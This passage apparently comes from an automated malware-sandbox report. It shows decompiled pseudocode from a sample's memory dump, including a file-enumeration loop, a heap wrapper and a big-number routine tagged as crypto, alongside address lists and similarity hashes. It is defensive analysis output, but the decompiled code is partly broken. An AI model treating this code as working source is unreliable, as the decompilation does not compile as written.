											_t90 = E00A3C9D0(_t108, _t81, _t90);
											continue;
										}
									}
								}
								break;
							}
							_t104 =  *_t90;
							__eflags = _t104 - 0x3a;
							if(_t104 != 0x3a) {
								L19:
								_t109 = 0;
								__eflags = _t104 - 0x2f;
								if(_t104 == 0x2f) {
									L23:
									__eflags = 1;
								} else {
									__eflags = _t104 - 0x5c;
									if(_t104 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t104 - 0x3a;
										if(_t104 == 0x3a) {
											goto L23;
										} else {
											1 = 0;
										}
									}
								}
								_t92 = _t90 - _t81 + 1;
								asm("sbb eax, eax");
								 *(_t121 - 0x14c) =  ~0x00000001 & _t90 - _t81 + 0x00000001;
								E00A31E90(_t109, _t121 - 0x144, _t109, 0x140);
								_t125 = _t124 + 0xc;
								_push(FindFirstFileExA(_t81, _t109, _t121 - 0x144, _t109, _t109, _t109));
								_pop(_t116);
								_t55 =  *((intOrPtr*)(_t121 - 0x148));
								__eflags = _t116 - 0xffffffff;
								if(_t116 != 0xffffffff) {
									_t94 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t94;
									_t95 = _t94 >> 2;
									 *(_t121 - 0x150) = _t94 >> 2;
									do {
										__eflags =  *((char*)(_t121 - 0x118)) - 0x2e;
										if( *((char*)(_t121 - 0x118)) != 0x2e) {
											L36:
											_push(_t55);
											_push( *(_t121 - 0x14c));
											_push(_t81);
											_push(_t121 - 0x118);
											_t57 = E00A3781C(_t81, _t95, _t109, _t116);
											_t125 = _t125 + 0x10;
											_t58 = _t57;
											__eflags = _t58;
											if(_t58 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t95 =  *((intOrPtr*)(_t121 - 0x117));
											__eflags = _t95;
											if(_t95 == 0) {
												goto L37;
											} else {
												__eflags = _t95 - 0x2e;
												if(_t95 != 0x2e) {
													goto L36;
												} else {
													__eflags =  *((char*)(_t121 - 0x116));
													if( *((char*)(_t121 - 0x116)) == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t63 = FindNextFileA(_t116, _t121 - 0x144);
										__eflags = _t63;
										_t55 =  *((intOrPtr*)(_t121 - 0x148));
									} while (_t63 != 0);
									_t105 =  *_t55;
									_t98 =  *(_t121 - 0x150);
									_t66 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t98 - _t66;
									if(_t98 != _t66) {
										E00A3C530(_t81, _t98, _t109, _t116, _t105 + _t98 * 4, _t66 - _t98, 4, E00A37674);
									}
								} else {
									_push(_t55);
									_push(_t109);
									_push(_t109);
									_push(_t81);
									_t58 = E00A3781C(_t81, _t92, _t109, _t116);
									L26:
									_t109 = _t58;
								}
								__eflags = _t116 - 0xffffffff;
								if(_t116 != 0xffffffff) {
									FindClose(_t116);
								}
							} else {
								__eflags = _t90 -  &(_t81[1]);
								if(_t90 ==  &(_t81[1])) {
									goto L19;
								} else {
									_push(_t115);
									_push(0);
									_push(0);
									_push(_t81);
									E00A3781C(_t81, _t90, 0, _t115);
								}
							}
							__eflags =  *(_t121 - 4) ^ _t121;
							return E00A31B61( *(_t121 - 4) ^ _t121);
						} else {
							goto L6;
						}
					}
				} else {
					_t75 = 0xc;
					L8:
					_push(_t120);
					return _t75;
				}
				L40:
			}

0x00a37820
0x00a37821
0x00a37822
0x00a37825
0x00a37825
0x00a37828
0x00a37828
0x00a3782a
0x00a3782b
0x00a37834
0x00a37835
0x00a37838
0x00a3783b
0x00a37840
0x00a37847
0x00a37848
0x00a3784c
0x00a37856
0x00a37857
0x00a37859
0x00a3785a
0x00a3785a
0x00a3785c
0x00a37870
0x00a37870
0x00a37873
0x00a3787d
0x00a37882
0x00a37885
0x00a37887
0x00000000
0x00a37889
0x00a3788c
0x00a3788d
0x00a37892
0x00a37895
0x00a37896
0x00a3789c
0x00000000
0x00a3789f
0x00a3785e
0x00a3785e
0x00a37864
0x00a37869
0x00a3786c
0x00a3786e
0x00a378a5
0x00a378a7
0x00a378a8
0x00a378a9
0x00a378aa
0x00a378ab
0x00a378ac
0x00a378b1
0x00a378b4
0x00a378b6
0x00a378b7
0x00a378bd
0x00a378c4
0x00a378c7
0x00a378ca
0x00a378cb
0x00a378ce
0x00a378cf
0x00a378d2
0x00a378d3
0x00a378f4
0x00a378f4
0x00a378f6
0x00000000
0x00000000
0x00a378db
0x00a378dd
0x00a378df
0x00a378e1
0x00a378e3
0x00a378e5
0x00a378e7
0x00a378f3
0x00000000
0x00a378f3
0x00a378e7
0x00a378e3
0x00000000
0x00a378df
0x00a378f8
0x00a378fa
0x00a378fd
0x00a37916
0x00a37916
0x00a37918
0x00a3791b
0x00a3792b
0x00a3792d
0x00a3791d
0x00a3791d
0x00a37920
0x00000000
0x00a37922
0x00a37922
0x00a37925
0x00000000
0x00a37927
0x00a37928
0x00a37928
0x00a37925
0x00a37920
0x00a37933
0x00a3793b
0x00a3793f
0x00a3794d
0x00a37952
0x00a37967
0x00a37968
0x00a37969
0x00a3796f
0x00a37972
0x00a379a4
0x00a379a4
0x00a379a6
0x00a379a9
0x00a379af
0x00a379af
0x00a379b6
0x00a379d0
0x00a379d0
0x00a379d1
0x00a379dd
0x00a379de
0x00a379df
0x00a379e4
0x00a379e7
0x00a379e7
0x00a379e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00a379b8
0x00a379b8
0x00a379be
0x00a379c0
0x00000000
0x00a379c2
0x00a379c2
0x00a379c5
0x00000000
0x00a379c7
0x00a379c7
0x00a379ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00a379ce
0x00a379c5
0x00a379c0
0x00000000
0x00a379eb
0x00a379f3
0x00a379f9
0x00a379fb
0x00a379fb
0x00a37a03
0x00a37a08
0x00a37a10
0x00a37a13
0x00a37a15
0x00a37a29
0x00a37a2e
0x00a37974
0x00a37974
0x00a37975
0x00a37976
0x00a37977
0x00a37978
0x00a37980
0x00a37980
0x00a37980
0x00a37982
0x00a37985
0x00a37988
0x00a37988
0x00a378ff
0x00a37902
0x00a37904
0x00000000
0x00a37906
0x00a37906
0x00a37909
0x00a3790a
0x00a3790b
0x00a3790c
0x00a37911
0x00a37904
0x00a37995
0x00a379a0
0x00000000
0x00000000
0x00000000
0x00a3786e
0x00a37842
0x00a37844
0x00a378a0
0x00a378a1
0x00a378a4
0x00a378a4
0x00000000

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4549a7806360d9c9deaf95480a7134faa6fd0d6878412769249a9b86862238e5
Instruction ID: a9d06411ef0af1456d8b5248535fd9551cb072b54edf19841964e7c9ac46bcdd
Opcode Fuzzy Hash: 4549a7806360d9c9deaf95480a7134faa6fd0d6878412769249a9b86862238e5
Instruction Fuzzy Hash: A731D2B2904149AECB24DF78DC89EFE7BBDDB86354F000299F419D6151D6319D85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A38F0E, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A38F0E() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xa4eda0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00a38f0e
0x00a38f16
0x00a38f1e

APIs

GetProcessHeap.KERNEL32 ref: 00A38F0E

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1d888c515e559474491d1ac66b1a683f8d65a16eb9fa64a702a30abf444ef823
Instruction ID: 65b1a44fc845ba158eaf248cc5d848557c63529564013409d74ced3cd32ab6a0
Opcode Fuzzy Hash: 1d888c515e559474491d1ac66b1a683f8d65a16eb9fa64a702a30abf444ef823
Instruction Fuzzy Hash: 02A0113CA002008F8380CFB2AE0820A3AA8BAC22803008828A008C0020EB3280A28B00

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A940, Relevance: .5, Instructions: 485
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00A3A940(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				void* _t204;
				signed int _t206;
				void* _t208;
				signed int _t209;
				signed int _t214;
				signed int _t220;
				intOrPtr _t226;
				void* _t229;
				signed int _t231;
				void* _t240;
				void* _t243;
				signed int _t248;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int* _t264;
				signed int _t267;
				signed int _t268;
				void* _t269;
				intOrPtr* _t270;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int* _t283;
				signed int* _t287;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				intOrPtr _t292;
				void* _t296;
				signed char _t302;
				void* _t304;
				signed int _t305;
				signed int _t313;
				void* _t315;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t322;
				signed int _t324;
				intOrPtr* _t326;
				signed int _t330;
				signed int _t334;
				signed int* _t340;
				signed int _t342;
				signed int _t345;
				void* _t346;
				unsigned int _t347;
				signed int _t350;
				signed int _t353;
				signed int* _t356;
				signed int _t361;
				signed int _t363;
				signed int _t364;
				void* _t368;
				signed int _t372;
				signed int _t373;
				signed int _t375;
				signed int* _t381;
				signed int* _t382;
				signed int* _t383;
				signed int* _t386;

				_t264 = _a4;
				_t197 =  *_t264;
				if(_t197 != 0) {
					_t340 = _a8;
					_t276 =  *_t340;
					__eflags = _t276;
					if(_t276 != 0) {
						_t3 = _t197 - 1; // -1
						_t361 = _t3;
						_t4 = _t276 - 1; // -1
						_t198 = _t4;
						_v16 = _t361;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t361;
							if(_t198 > _t361) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t315 = _t361;
								_t46 = _t198 + 1; // 0x0
								_t316 = _t315 - _t198;
								_v60 = _t46;
								_t278 = _t361;
								__eflags = _t361 - _t316;
								if(_t361 < _t316) {
									L21:
									_t316 = _t316 + 1;
									__eflags = _t316;
								} else {
									_t240 = _t278;
									_t381 =  &(_t264[_t361 + 1]);
									_t353 =  &(( &(_t340[_t240 - _t316]))[1]);
									__eflags = _t353;
									while(1) {
										__eflags =  *_t353 -  *_t381;
										if( *_t353 !=  *_t381) {
											break;
										}
										_t278 = _t278 - 1;
										_t353 = _t353 - 4;
										_t381 = _t381 - 4;
										__eflags = _t278 - _t316;
										if(_t278 >= _t316) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t382 = _a8;
									_t243 = _t278;
									_t54 = (_t243 - _t316) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t382 + _t54 + 4)) -  *((intOrPtr*)(_t264 + 4 + _t278 * 4));
									if( *((intOrPtr*)(_t382 + _t54 + 4)) <  *((intOrPtr*)(_t264 + 4 + _t278 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t316;
								if(__eflags != 0) {
									_t342 = _v60;
									_t200 = _a8;
									_t363 =  *(_t200 + _t342 * 4);
									_t64 = _t342 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t363;
									if(__eflags == 0) {
										_t279 = 0x20;
									} else {
										_t304 = 0x1f;
										_t279 = _t304 - _t201;
									}
									_v40 = _t279;
									_v64 = 0x20 - _t279;
									__eflags = _t279;
									if(_t279 != 0) {
										_t302 = _v40;
										_v36 = _v36 << _t302;
										_v56 = _t363 << _t302 | _v36 >> _v64;
										__eflags = _t342 - 2;
										if(_t342 > 2) {
											_t79 = _t342 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_t364 = 0;
									_v76 = 0;
									_t317 = _t316 + 0xffffffff;
									__eflags = _t317;
									_v32 = _t317;
									if(_t317 < 0) {
										__eflags = 0;
									} else {
										_t85 =  &(_t264[1]); // 0x4
										_v20 =  &(_t85[_t317]);
										_t206 = _t317 + _t342;
										_t90 = _t264 - 4; // -4
										_v12 = _t206;
										_t287 = _t90 + _t206 * 4;
										_v80 = _t287;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t287[2];
											}
											__eflags = _v40;
											_t322 = _t287[1];
											_t288 =  *_t287;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t288;
											if(_v40 > 0) {
												_t347 = _t288;
												_t330 = _v8;
												_t231 = E00A3F240(_t322, _v40, _t330);
												_t288 = _v40;
												_t207 = _t330;
												_t322 = _t347 >> _v64 | _t231;
												_t372 = _v24 << _t288;
												__eflags = _v12 - 3;
												_v8 = _t330;
												_v24 = _t372;
												if(_v12 >= 3) {
													_t288 = _v64;
													_t373 = _t372 |  *(_t264 + (_v60 + _v32) * 4 - 8) >> _t288;
													__eflags = _t373;
													_t207 = _v8;
													_v24 = _t373;
												}
											}
											_t208 = E00A3EFA0(_t322, _t207, _v56, 0);
											_v44 = _t264;
											_t267 = _t208;
											_v44 = 0;
											_t209 = _t322;
											_v8 = _t267;
											_v28 = _t209;
											_t345 = _t288;
											_v72 = _t267;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t268 = _t267 + 1;
												asm("adc eax, 0xffffffff");
												_t345 = _t345 + E00A3F0A0(_t268, _t209, _v56, 0);
												asm("adc esi, edx");
												_t267 = _t268 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t267;
												_v72 = _t267;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t267 - 0xffffffff;
												if(_t267 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t345 - 0xffffffff;
													if(_t345 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t229 = E00A3F0A0(_v36, 0, _t267, _t209);
															__eflags = _t322 - _t345;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t267 = _t267 + 0xffffffff;
																_v72 = _t267;
																asm("adc eax, 0xffffffff");
																_t345 = _t345 + _v56;
																__eflags = _t345;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t345 == 0) {
																	__eflags = _t345 - 0xffffffff;
																	if(_t345 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t229 - _v8;
																if(_t229 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t267;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t289 = _v60;
												_t346 = 0;
												_t368 = 0;
												__eflags = _t289;
												if(_t289 != 0) {
													_t270 = _v20;
													_t220 =  &(_a8[1]);
													__eflags = _t220;
													_v24 = _t220;
													_v16 = _t289;
													do {
														_v44 =  *_t220;
														_t226 =  *_t270;
														_t296 = _t346 + _v72 * _v44;
														asm("adc esi, edx");
														_t346 = _t368;
														_t368 = 0;
														__eflags = _t226 - _t296;
														if(_t226 < _t296) {
															_t346 = _t346 + 1;
															asm("adc esi, esi");
														}
														 *_t270 = _t226 - _t296;
														_t270 = _t270 + 4;
														_t220 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t220;
													} while ( *_t164 != 0);
													_t267 = _v8;
													_t289 = _v60;
												}
												__eflags = 0 - _t368;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														_t291 = _t289;
														__eflags = _t291;
														if(_t291 != 0) {
															_t350 = _t291;
															_t326 = _v20;
															_t375 =  &(_a8[1]);
															__eflags = _t375;
															_t269 = 0;
															do {
																_t292 =  *_t326;
																_t172 = _t375 + 4; // 0xa6a5959
																_t375 = _t172;
																_t326 = _t326 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t326 - 4)) = _t292 +  *((intOrPtr*)(_t375 - 4)) + _t269;
																asm("adc eax, 0x0");
																_t269 = 0;
																_t350 = _t350 - 1;
																__eflags = _t350;
															} while (_t350 != 0);
															_t267 = _v8;
														}
														_t267 = _t267 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t346;
														if(_v52 < _t346) {
															goto L63;
														}
													}
												}
												_t214 = _v12 - 1;
												__eflags = _t214;
												_v16 = _t214;
											} else {
												__eflags = _t267;
												if(_t267 != 0) {
													goto L54;
												}
											}
											_t364 = _v76;
											_push(0 + _t267);
											_pop(0);
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t324 = _v32 - 1;
											_t264 = _a4;
											_t287 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = 0;
											_v32 = _t324;
											_v80 = _t287;
											_v12 = _t206;
											__eflags = _t324;
										} while (_t324 >= 0);
									}
									_t319 = _v16 + 1;
									_t204 = _t319;
									__eflags = _t204 -  *_t264;
									if(_t204 <  *_t264) {
										_t191 = _t204 + 1; // 0xa3bf5d
										_t283 =  &(_t264[_t191]);
										do {
											 *_t283 = 0;
											_t194 =  &(_t283[1]); // 0x91850fc2
											_t283 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t264;
										} while (_t204 <  *_t264);
									}
									 *_t264 = _t319;
									__eflags = _t319;
									if(_t319 != 0) {
										while(1) {
											_t280 =  *_t264;
											__eflags = _t264[_t280];
											if(_t264[_t280] != 0) {
												goto L78;
											}
											_t281 = _t280 + 0xffffffff;
											__eflags = _t281;
											 *_t264 = _t281;
											if(_t281 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									_push(_t364);
									return 0;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t340[1]); // 0xfc23b5a
							_t305 =  *_t6;
							_v44 = _t305;
							__eflags = _t305 - 1;
							if(_t305 != 1) {
								__eflags = _t361;
								if(_t361 != 0) {
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t361 - 0xffffffff;
									if(_t361 != 0xffffffff) {
										_t251 = _v16 + 1;
										__eflags = _t251;
										_v32 = _t251;
										_t386 =  &(_t264[_t361 + 1]);
										do {
											_t254 = E00A3EFA0( *_t386, 0, _t305, 0);
											_v68 = _t313;
											_t386 = _t386 - 4;
											_v20 = _t264;
											_push(_t305);
											_pop(0);
											_t313 = 0 + _t254;
											asm("adc ecx, 0x0");
											_v12 = _t313;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t305 = _v44;
										} while ( *_t34 != 0);
										_t264 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t264[1]); // 0x4
									_t383 = _t41;
									 *_t264 = 0;
									E00A3C18A(_t383, 0x1cc,  &_v540, 0);
									_t248 = _v20;
									__eflags = 0 - _t248;
									 *_t383 = 0;
									_t264[2] = _t248;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t264 = 0xbadbae;
									_push(_t391);
									return _v12;
								} else {
									_t14 =  &(_t264[1]); // 0x4
									_t356 = _t14;
									_v544 = 0;
									 *_t264 = 0;
									E00A3C18A(_t356, 0x1cc,  &_v540, 0);
									_t257 = _t264[1];
									_t334 = _t257 % _v44;
									__eflags = 0 - _t334;
									 *_t356 = _t334;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t264 =  ~0x00000000;
									return _t257 / _v44;
								}
							} else {
								_t9 =  &(_t264[1]); // 0x4
								_v544 = _t198;
								 *_t264 = _t198;
								E00A3C18A(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t264[1];
							}
						}
					} else {
						__eflags = 0;
						_push(_t391);
						return 0;
					}
				} else {
					_push(_t391);
					return _t197;
				}
			}

0x00a3a94c
0x00a3a94f
0x00a3a953
0x00a3a95d
0x00a3a960
0x00a3a962
0x00a3a964
0x00a3a971
0x00a3a971
0x00a3a974
0x00a3a974
0x00a3a977
0x00a3a97a
0x00a3a97c
0x00a3aaaf
0x00a3aab1
0x00a3aafa
0x00a3aafe
0x00a3ab04
0x00a3aab3
0x00a3aab4
0x00a3aab5
0x00a3aab8
0x00a3aaba
0x00a3aabe
0x00a3aabf
0x00a3aac1
0x00a3aaf5
0x00a3aaf5
0x00a3aaf5
0x00a3aac3
0x00a3aac4
0x00a3aac8
0x00a3aace
0x00a3aace
0x00a3aad1
0x00a3aad3
0x00a3aad5
0x00000000
0x00000000
0x00a3aad7
0x00a3aad8
0x00a3aadb
0x00a3aade
0x00a3aae0
0x00000000
0x00a3aae2
0x00000000
0x00a3aae2
0x00000000
0x00a3aae0
0x00a3aae4
0x00a3aae8
0x00a3aaeb
0x00a3aaef
0x00a3aaf3
0x00000000
0x00000000
0x00a3aaf3
0x00a3aaf6
0x00a3aaf6
0x00a3aaf8
0x00a3ab05
0x00a3ab08
0x00a3ab0b
0x00a3ab0e
0x00a3ab0e
0x00a3ab12
0x00a3ab15
0x00a3ab18
0x00a3ab1b
0x00a3ab26
0x00a3ab1d
0x00a3ab1f
0x00a3ab22
0x00a3ab22
0x00a3ab30
0x00a3ab35
0x00a3ab38
0x00a3ab3a
0x00a3ab44
0x00a3ab47
0x00a3ab4e
0x00a3ab51
0x00a3ab54
0x00a3ab5c
0x00a3ab62
0x00a3ab62
0x00a3ab62
0x00a3ab62
0x00a3ab54
0x00a3ab65
0x00a3ab67
0x00a3ab6e
0x00a3ab6e
0x00a3ab71
0x00a3ab74
0x00a3ada6
0x00a3ab7a
0x00a3ab7a
0x00a3ab80
0x00a3ab83
0x00a3ab86
0x00a3ab89
0x00a3ab8c
0x00a3ab8f
0x00a3ab92
0x00a3ab92
0x00a3ab95
0x00a3ab9c
0x00a3ab9c
0x00a3ab97
0x00a3ab97
0x00a3ab97
0x00a3ab9e
0x00a3aba2
0x00a3aba5
0x00a3aba7
0x00a3abaa
0x00a3abb1
0x00a3abb4
0x00a3abb7
0x00a3abba
0x00a3abc2
0x00a3abca
0x00a3abcf
0x00a3abd6
0x00a3abdc
0x00a3abdd
0x00a3abdf
0x00a3abe3
0x00a3abe6
0x00a3abe9
0x00a3abf1
0x00a3abfa
0x00a3abfa
0x00a3abfc
0x00a3abff
0x00a3abff
0x00a3abe9
0x00a3ac09
0x00a3ac0e
0x00a3ac14
0x00a3ac15
0x00a3ac18
0x00a3ac1a
0x00a3ac1d
0x00a3ac20
0x00a3ac22
0x00a3ac25
0x00a3ac28
0x00a3ac2a
0x00a3ac31
0x00a3ac36
0x00a3ac39
0x00a3ac43
0x00a3ac45
0x00a3ac47
0x00a3ac4a
0x00a3ac4a
0x00a3ac4c
0x00a3ac4f
0x00a3ac52
0x00a3ac55
0x00a3ac58
0x00a3ac2c
0x00a3ac2c
0x00a3ac2f
0x00000000
0x00000000
0x00a3ac2f
0x00a3ac5b
0x00a3ac5d
0x00a3ac5f
0x00000000
0x00a3ac61
0x00a3ac61
0x00a3ac64
0x00a3ac66
0x00a3ac66
0x00a3ac74
0x00a3ac77
0x00a3ac7c
0x00a3ac7e
0x00000000
0x00000000
0x00a3ac80
0x00a3ac87
0x00a3ac87
0x00a3ac8a
0x00a3ac8d
0x00a3ac90
0x00a3ac93
0x00a3ac93
0x00a3ac96
0x00a3ac99
0x00a3ac9d
0x00a3aca0
0x00a3aca2
0x00a3aca5
0x00000000
0x00000000
0x00a3aca7
0x00a3aca5
0x00a3ac82
0x00a3ac82
0x00a3ac85
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3ac85
0x00a3acac
0x00a3acac
0x00000000
0x00a3acac
0x00a3aca9
0x00000000
0x00a3aca9
0x00a3ac64
0x00a3ac5f
0x00a3acaf
0x00a3acaf
0x00a3acb1
0x00a3acbb
0x00a3acbb
0x00a3acbe
0x00a3acc0
0x00a3acc2
0x00a3acc4
0x00a3acc9
0x00a3accc
0x00a3accc
0x00a3accf
0x00a3acd2
0x00a3acd5
0x00a3acd7
0x00a3acec
0x00a3acee
0x00a3acf0
0x00a3acf2
0x00a3acf4
0x00a3acf6
0x00a3acf8
0x00a3acfa
0x00a3acfd
0x00a3acfd
0x00a3ad01
0x00a3ad03
0x00a3ad09
0x00a3ad0c
0x00a3ad0c
0x00a3ad0c
0x00a3ad10
0x00a3ad10
0x00a3ad15
0x00a3ad18
0x00a3ad18
0x00a3ad1d
0x00a3ad1f
0x00a3ad21
0x00a3ad28
0x00a3ad28
0x00a3ad28
0x00a3ad2a
0x00a3ad30
0x00a3ad31
0x00a3ad34
0x00a3ad34
0x00a3ad37
0x00a3ad40
0x00a3ad40
0x00a3ad42
0x00a3ad42
0x00a3ad47
0x00a3ad4d
0x00a3ad51
0x00a3ad54
0x00a3ad57
0x00a3ad59
0x00a3ad59
0x00a3ad59
0x00a3ad5e
0x00a3ad5e
0x00a3ad61
0x00a3ad64
0x00a3ad23
0x00a3ad23
0x00a3ad26
0x00000000
0x00000000
0x00a3ad26
0x00a3ad21
0x00a3ad6b
0x00a3ad6b
0x00a3ad6c
0x00a3acb3
0x00a3acb3
0x00a3acb5
0x00000000
0x00000000
0x00a3acb5
0x00a3ad6f
0x00a3ad7c
0x00a3ad7d
0x00a3ad81
0x00a3ad84
0x00a3ad88
0x00a3ad89
0x00a3ad8c
0x00a3ad8f
0x00a3ad90
0x00a3ad93
0x00a3ad96
0x00a3ad99
0x00a3ad9c
0x00a3ad9c
0x00a3ada4
0x00a3adab
0x00a3adad
0x00a3adae
0x00a3adb0
0x00a3adb2
0x00a3adb5
0x00a3adc0
0x00a3adc0
0x00a3adc6
0x00a3adc6
0x00a3adc9
0x00a3adca
0x00a3adca
0x00a3adc0
0x00a3adce
0x00a3add0
0x00a3add2
0x00a3add4
0x00a3add4
0x00a3add6
0x00a3adda
0x00000000
0x00000000
0x00a3addc
0x00a3addc
0x00a3addf
0x00a3ade1
0x00000000
0x00000000
0x00000000
0x00a3ade1
0x00a3add4
0x00a3ade3
0x00a3ade3
0x00a3aded
0x00000000
0x00000000
0x00000000
0x00a3aaf8
0x00a3a982
0x00a3a982
0x00a3a982
0x00a3a985
0x00a3a988
0x00a3a98b
0x00a3a9bc
0x00a3a9be
0x00a3aa0b
0x00a3aa12
0x00a3aa19
0x00a3aa1c
0x00a3aa1f
0x00a3aa25
0x00a3aa25
0x00a3aa26
0x00a3aa29
0x00a3aa30
0x00a3aa39
0x00a3aa3e
0x00a3aa41
0x00a3aa46
0x00a3aa49
0x00a3aa4a
0x00a3aa4b
0x00a3aa50
0x00a3aa53
0x00a3aa56
0x00a3aa56
0x00a3aa56
0x00a3aa5a
0x00a3aa5d
0x00a3aa5d
0x00a3aa62
0x00a3aa62
0x00a3aa6d
0x00a3aa78
0x00a3aa78
0x00a3aa7b
0x00a3aa87
0x00a3aa8c
0x00a3aa97
0x00a3aa99
0x00a3aa9b
0x00a3aaa1
0x00a3aaa6
0x00a3aaa8
0x00a3aaab
0x00a3aaae
0x00a3a9c0
0x00a3a9cc
0x00a3a9cc
0x00a3a9cf
0x00a3a9df
0x00a3a9e5
0x00a3a9ed
0x00a3a9ee
0x00a3a9f6
0x00a3a9f8
0x00a3a9fa
0x00a3a9ff
0x00a3aa02
0x00a3aa08
0x00a3aa08
0x00a3a98d
0x00a3a990
0x00a3a994
0x00a3a99a
0x00a3a9a9
0x00a3a9b3
0x00a3a9bb
0x00a3a9bb
0x00a3a98b
0x00a3a966
0x00a3a969
0x00a3a96c
0x00a3a96f
0x00a3a96f
0x00a3a955
0x00a3a958
0x00a3a95b
0x00a3a95b

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018c8fc1d8ae70ae3e47ce6107c11e00771528e6c5a977e4cc2135edd7bb35c1
Instruction ID: e2f29b10ffaecc452edb029446ea733148921003488e6f36adec44c5377194d7
Opcode Fuzzy Hash: 018c8fc1d8ae70ae3e47ce6107c11e00771528e6c5a977e4cc2135edd7bb35c1
